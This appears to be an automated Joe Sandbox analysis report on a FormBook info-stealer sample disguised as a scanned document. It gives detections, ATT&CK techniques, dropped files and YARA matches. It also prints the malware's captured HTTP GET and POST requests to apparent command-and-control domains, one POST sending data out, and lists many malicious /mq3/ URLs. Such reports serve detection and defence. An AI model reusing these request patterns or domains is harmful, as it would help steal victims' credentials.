
Analysis Report Scan_Doc_11052020.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:229288
Start date:12.05.2020
Start time:03:19:02
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 12m 36s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Scan_Doc_11052020.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@15/10@4/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 14.8% (good quality ratio 13.4%)
  • Quality average: 70.5%
  • Quality standard deviation: 30.7%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 114
  • Number of non-executed functions: 307
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 2.18.68.82, 205.185.216.42, 205.185.216.10, 104.18.134.62, 104.18.132.62, 104.18.133.62, 104.18.135.62, 104.18.136.62
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, format.com.cdn.cloudflare.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy:Threshold
Score:100
Range:0 - 100
Whitelisted:false
Threat:FormBook
Detection:malicious

Confidence

Strategy:Threshold
Score:5
Range:0 - 5
Further Analysis Required?:false


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons; more UI automation would likely extend behavior
Sample tries to load a library which is not present or installed on the analysis machine; adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link; Spearphishing Attachment; Spearphishing via Service
Execution: Execution through Module Load 1; Exploitation for Client Execution 1; Windows Management Instrumentation; Scheduled Task; Command-Line Interface; Graphical User Interface; Scripting; Third-party Software
Persistence: Registry Run Keys / Startup Folder 1; Port Monitors; Accessibility Features; System Firmware; Shortcut Modification; Modify Existing Service; Path Interception; Logon Scripts
Privilege Escalation: Process Injection 512; Accessibility Features; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness; New Service; Scheduled Task; Process Injection
Defense Evasion: Software Packing 1; Disabling Security Tools 1; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 2; Masquerading 1; Virtualization/Sandbox Evasion 3; Process Injection 512; DLL Side-Loading 1
Credential Access: Credential Dumping 1; Network Sniffing; Input Capture; Credentials in Files; Account Manipulation; Brute Force; Two-Factor Authentication Interception; Bash History
Discovery: Security Software Discovery 231; File and Directory Discovery 2; System Information Discovery 112; Virtualization/Sandbox Evasion 3; Process Discovery 2; Remote System Discovery 1; Network Sniffing; Network Service Scanning
Lateral Movement: Remote File Copy 3; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software; Pass the Hash; Remote Desktop Protocol
Collection: Man in the Browser 1; Data from Local System 1; Email Collection 1; Input Capture; Data Staged; Screen Capture; Email Collection; Clipboard Data
Exfiltration: Data Encrypted 1; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over Command and Control Channel; Exfiltration Over Alternative Protocol
Command and Control: Remote File Copy 3; Standard Cryptographic Protocol 1; Standard Non-Application Layer Protocol 4; Standard Application Layer Protocol 14; Standard Cryptographic Protocol; Commonly Used Port; Uncommonly Used Port; Standard Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

Signature Overview



AV Detection:

Antivirus detection for URL or domain
Source: http://www.brandbank.news/mq3/; Avira URL Cloud: Label: malware
Source: http://www.brandbank.news/mq3/www.shimi783.info; Avira URL Cloud: Label: malware
Source: http://www.brandbank.news; Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://www.porcber.com; Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Zhrptqdzh\vrhdctut50jxtp.exe; Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Local\Temp\Zhrptqdzh\vrhdctut50jxtp.exe; ReversingLabs: Detection: 35%
Multi AV Scanner detection for submitted file
Source: Scan_Doc_11052020.exe; Virustotal: Detection: 19%
Source: Scan_Doc_11052020.exe; ReversingLabs: Detection: 35%
Yara detected FormBook
Source: Yara match; File source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Networking:

HTTP GET or POST without a user agent
Source: global traffic; HTTP traffic detected:
  GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Rok90QOK6ea72UleUAJ4ErWaSqt/IQVB8JdCNgRpDbdf1LJgzNf1D86eRIdXJU+axZ+t HTTP/1.1
  Host: www.bzasd.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected:
  GET /mq3/?SXGT2PEh=r8Q75MIXz7zy5sB899Th1/k9+Lnr+VmPBQzoNFk56PWTbuYDB27UYmJg83KfwIIDO73Z&fDK=BhjLRlh HTTP/1.1
  Host: www.dllearn.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected:
  GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1
  Host: www.axcyl.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View; IP Address: 50.63.202.49
Internet Provider seen in connection with other malware
Source: Joe Sandbox View; ASN Name: unknown
Uses a known web browser user agent for HTTP communication
Source: global traffic; HTTP traffic detected:
  POST /mq3/ HTTP/1.1
  Host: www.dllearn.com
  Connection: close
  Content-Length: 182834
  Cache-Control: no-cache
  Origin: http://www.dllearn.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.dllearn.com/mq3/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: [hex dump of the form-encoded POST body not reproduced]
Source: global traffic; HTTP traffic detected:
  POST /mq3/ HTTP/1.1
  Host: www.axcyl.com
  Connection: close
  Content-Length: 182834
  Cache-Control: no-cache
  Origin: http://www.axcyl.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.axcyl.com/mq3/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: [hex dump of the form-encoded POST body not reproduced]
Downloads files from webservers via HTTP
Source: global traffic; HTTP traffic detected:
  GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Rok90QOK6ea72UleUAJ4ErWaSqt/IQVB8JdCNgRpDbdf1LJgzNf1D86eRIdXJU+axZ+t HTTP/1.1
  Host: www.bzasd.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected:
  GET /mq3/?SXGT2PEh=r8Q75MIXz7zy5sB899Th1/k9+Lnr+VmPBQzoNFk56PWTbuYDB27UYmJg83KfwIIDO73Z&fDK=BhjLRlh HTTP/1.1
  Host: www.dllearn.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected:
  GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1
  Host: www.axcyl.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Performs DNS lookups
Source: unknown; DNS traffic detected: queries for: www.bzasd.com
Posts data to webserver
Source: unknown; HTTP traffic detected:
  POST /mq3/ HTTP/1.1
  Host: www.dllearn.com
  Connection: close
  Content-Length: 182834
  Cache-Control: no-cache
  Origin: http://www.dllearn.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.dllearn.com/mq3/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: [hex dump of the form-encoded POST body not reproduced]
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Tue, 12 May 2020 01:20:29 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  Data Raw: [hex dump of the chunked HTML error page not reproduced]
Urls found in memory or binary data
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.815949561.0000000007B92000.00000004.00000001.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp, systray.exe, 00000004.00000002.1201355608.00000000053E9000.00000004.00000001.sdmp; String found in binary or memory: http://www.axcyl.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp, systray.exe, 00000004.00000002.1201355608.00000000053E9000.00000004.00000001.sdmp; String found in binary or memory: http://www.axcyl.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.axcyl.com/mq3/www.samdeng.works
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.axcyl.comReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.brandbank.news
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.brandbank.news/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.brandbank.news/mq3/www.shimi783.info
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.brandbank.newsReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.bridgejfc.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.bridgejfc.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.bridgejfc.com/mq3/www.porcber.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.bridgejfc.comReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.bzasd.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.bzasd.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.bzasd.com/mq3/www.dllearn.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.bzasd.comReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.carnescolombia.services
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.carnescolombia.services/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.carnescolombia.services/mq3/www.bridgejfc.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.carnescolombia.servicesReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.dearisorealestate.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.dearisorealestate.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.dearisorealestate.com/mq3/www.r2019.biz
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.dearisorealestate.comReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.dllearn.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.dllearn.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.dllearn.com/mq3/www.axcyl.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.dllearn.comReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.hellsoasis.net
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.hellsoasis.net/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.hellsoasis.net/mq3/www.meetlove94.life
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.hellsoasis.netReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.meetlove94.life
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.meetlove94.life/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.meetlove94.lifeReferer:
Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmp; String found in binary or memory: http://www.mipcms.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.mymtaporta.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.mymtaporta.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.mymtaporta.com/mq3/www.smsjtj.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.mymtaporta.comReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.porcber.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.porcber.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.porcber.com/mq3/www.hellsoasis.net
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.porcber.comReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.r2019.biz
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.r2019.biz/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.r2019.biz/mq3/www.mymtaporta.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.r2019.bizReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.samdeng.works
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.samdeng.works/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.samdeng.works/mq3/www.xavnzfw.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp; String found in binary or memory: http://www.samdeng.worksReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.info
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.info/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.info/mq3/www.dearisorealestate.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.shimi783.infoReferer:
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.smsjtj.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.smsjtj.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.smsjtj.com/mq3/www.carnescolombia.services
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.smsjtj.comReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.xavnzfw.com
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.xavnzfw.com/mq3/
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.xavnzfw.com/mq3/www.brandbank.news
Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmpString found in binary or memory: http://www.xavnzfw.comReferer:
Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmpString found in binary or memory: https://m.baidu.com/
Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmpString found in binary or memory: https://mipcache.bdstatic.com/static/v1/mip-stats-baidu/mip-stats-baidu.js
Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmpString found in binary or memory: https://mipcache.bdstatic.com/static/v1/mip.css
Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmpString found in binary or memory: https://mipcache.bdstatic.com/static/v1/mip.js

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\systray.exe | Dropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogri.ini
Source: C:\Windows\SysWOW64\systray.exe | Dropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogrf.ini
Source: C:\Windows\SysWOW64\systray.exe | Dropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogrv.ini
Malicious sample detected (through community Yara rule)
Source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
